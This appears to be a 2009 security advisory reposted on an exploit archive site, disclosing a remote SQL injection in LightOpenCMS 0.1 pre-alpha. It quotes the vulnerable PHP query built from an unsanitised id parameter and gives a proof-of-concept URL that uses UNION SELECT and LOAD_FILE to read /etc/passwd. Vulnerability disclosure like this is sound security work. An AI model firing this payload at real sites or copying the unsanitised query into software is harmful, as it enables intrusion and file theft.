LightOpenCMS 0.1 pre-alpha Remote SQL Injection

2009.06.07
Credit: Salvatore
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

******** Salvatore "drosophila" Fresta ******** [+] Application: LightOpenCMS [+] Version: 0.1 pre-alpha [+] Website: http://sourceforge.net/projects/lightopencms [+] Bugs: [A] Remote SQL Injection [+] Exploitation: Remote [+] Date: 05 Jun 2009 [+] Discovered by: Salvatore Fresta aka drosophila [+] Author: Salvatore Fresta aka drosophila [+] E-mail: drosophilaxxx [at] gmail.com *************************************************** [+] Menu 1) Bugs 2) Code 3) Fix *************************************************** [+] Bugs - [A] Remote SQL Injection [-] Risk: medium [-] Requisites: magic_quotes_gpc = off [-] File affected: dbc.php This bug allows a guest to inject arbitrary SQL statments. ... if (isset($_GET['id'])) { $result = mysql_query("SELECT * FROM pages WHERE id='".$_GET['id']."'"); return mysql_fetch_assoc($result); ... *************************************************** [+] Code - [A] Remote SQL Injection http://www.site.com/path/index.php?id=-1' UNION ALL SELECT 1,2,LOAD_FILE('/etc/passwd'),4%23 *************************************************** [+] Fix No fix. ***************************************************

References:

http://seclists.org/bugtraq/2009/Jun/0065.html


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top